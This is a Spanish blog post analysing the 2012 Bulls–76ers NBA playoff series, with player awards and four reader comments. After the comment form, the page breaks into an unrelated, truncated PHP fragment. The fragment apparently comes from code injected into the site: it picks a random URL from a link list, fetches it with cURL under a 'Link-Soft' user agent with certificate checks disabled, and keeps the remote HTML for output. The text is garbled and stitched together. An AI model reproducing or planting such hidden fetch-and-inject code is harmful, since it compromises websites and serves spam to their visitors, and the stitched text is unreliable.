Resumen Bulls 2 – 76ers 4

11 de May de 2012 por txusma

Análisis de la eliminatoria

En los últimos minutos del primer partido de la serie todos los pronósticos saltaron por los aires. La lesión de Derrick Rose dejó la eliminatoria patas arriba y abrió el abanico de posibilidades. De todas maneras, aún sin el actual MVP de la liga los Bulls seguían pareciendo superiores a unos Sixers a los que la temporada se les está haciendo larguísima. Pero el segundo partido cayó del lado de Philadelphia. Joakim Noah se quedó demasiado solo ante la inoperancia de Luol Deng y Carlos Boozer y los Sixers jugaron su mejor partido de la serie. Los Bulls necesitaban recuperar la confianza que les había llevado a dominar la regular a pesar de no contar en muchos partidos con Derrick Rose. No era el momento de lamentarse y sí de dar un paso al frente y luchar por la victoria.

No fue en el tercer partido. Carlos Boozer respondió pero Luol Deng seguía sumido en la ineficacia y esta vez se le unió CJ Watson. Demasiada ventaja para el rival. Por si fuera poco, Joakim Noah se lesionaba su tobillo izquierdo y era duda para el siguiente partido. Se estaba poniendo demasiado épico el asunto. Los Bulls iniciaban el cuarto partido con las bajas de Derrick Rose y Joakim Noah y pocos hubieran dado un duro por ellos pero lo cierto es que lucharon y tuvieron el partido en su mano. En los últimos minutos, el resurgir de Holiday y sobretodo un más que discutible criterio arbitral acabó otorgando la victoria a los Sixers. Aunque Chicago consiguió llevarse el quinto partido, esta misma noche Iguodala sellaba con 2 tiros libres el pase de Philadelphia a 2ª ronda por primera vez desde 2003.

A pesar de que la alegría se desbordó en el  Wells Fargo Center, los Sixers no tienen muchos motivos para estar contentos. Ante un equipo con 2 bajas tan importantes como las de Derrick Rose y Joakim Noah han sufrido lo indecible para llevarse cada partido. Boston se los va a comer con patatas a poco que muestre algo de interés.

PREMIOS

MVP: Jrue Holiday dio la victoria a los Sixers en un importantísimo cuarto partido y ha mantenido un buen nivel durante toda la serie (18’2 puntos, 5’2 rebotes, 4’7 asistencias, 1’3 robos). En Philadelphia deberían empezar a plantearse si darle el mando definitivamente de cara al año que viene.

Sorpresa: Nadie ha destacado por encima de sus posibilidades. Con esos partidos a menos de 80 puntos es complicado.

Decepción: Boozer y Deng acabaron apareciendo pero se les echó mucho de menos en los 3 primeros partidos. Sus sueldos exigen algo más que 14 puntos por partido y más si Derrick Rose no está en pista. Elton Brand tampoco ha estado muy sembrado.

Esfuerzo en vano: El de todos los Bulls. Ante la baja de Derrick Rose, Joakim Noah dio un paso al frente y con la lesión de este fue el turno de Carlos Boozer y Luol Deng. Todos los jugadores apretaron los dientes y lucharon por mantenerse vivos pero resultó finalmente imposible.

Comenta

4 comentarios a esta entrada

  1. German dice:
    #1

    Sensacion de injusticia. No solo por la lesion de Rose que ya es mucho decir, sino ademas porque tambien pierden a Noah, asi y todo en las ultimas tres derrotas los Bulls estuvieron al frente hasta el final.
    Toda una temporada en primer lugar y en el momento de la verdad te caen las desgracias de las lesiones, una pena.

      Citar

  2. Sancho88 dice:
    #2

    El mérito de Holiday en gran parte es de Doug Collins. Pocos entrenadores habrían apostado tan al 100% por un jugador como él. No es un base alto, no es demasiado fuerte… y además tienes a un tipo como Williams que ofensivamente sabe resolver. Cualquier otro entrenador le habría relegado a un segundo plano, pero Collins ha confiado siempre en él. Tanto en los partidos que la cagaba y hacía un 3/14 como luego en las réplicas siguientes, donde a veces rozaba la perfección haciendo 11/12 y series de tiro similares. A nada que se consolide, será un buen base titular para los Sixers. Roba muy bien, rebotea tanto atrás como delante y quizá hay que exigirle mayor conocimiento del juego, más dirección.

    Obviamente está eliminatoria quedó condicionada desde el principio por la lesión de Rose, y a partir de ahí todas las lecturas posibles de la serie se vienen abajo. Sin su líder, Bulls ya sabían que de no caer aquí habrían caído un paso más tarde, y eso yo creo que les ha pesado mucho. Además el tobillo de Noah… imposible ganar a 7 partidos sin tu base y sin tu pívot, que suelen ser las claves de muchos equipos. Muchos partidos hasta la final, la presión de que también el año pasado decepcionaron, y las limitaciones ofensivas del equipo obraron todo lo demás. No se puede vivir solo de la defensa… y los Sixers por su parte lo tenían a huevo. Una rotación bastante amplia, aunque escasa de calidad, por lo general, pero que seguro que en los momentos apretados se ha hecho notar, porque llegaban más frescos y lúcidos para resolver. De todas maneras, eliminatoria a muy pocos puntos, como se esperaba, y un poco tostón. Coincido contigo en que Sixers no tienen opciones contra Celtics, aunque tampoco se lo pondrán a huevo. Ahora es cuestión suya si se quieren conformar con la segunda ronda o quieren buscarles las cosquillas a los viejorros. Un par de partidos ganan seguro, y si Celtics no están concentrados al 100% puede que les lleven hasta el séptimo. En estos momentos Hawes está de dúlce, Iggy es infinitamente superior a Bass, y gente como Brand o Turner hay que exigirles que espabilen. Los bases le pondrán más problemas a Rondo que Teague. No sé, Philly tiene plantila más amplia que Hawks, no tan buen quinteto, pero les harán sudar más, porque son todos jóvenes y la ventaja la tienen que buscar corriendo, no les queda otra

      Citar

  3. txusma dice:
    #3

    Mañana sacamos el análisis pero vaya que lo que no sea un 4-0 o 4-1 para mi es una sorpresa.

      Citar

  4. Sancho88 dice:
    #4

    Pues yo aquí pondría 4-3 para Celtics

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>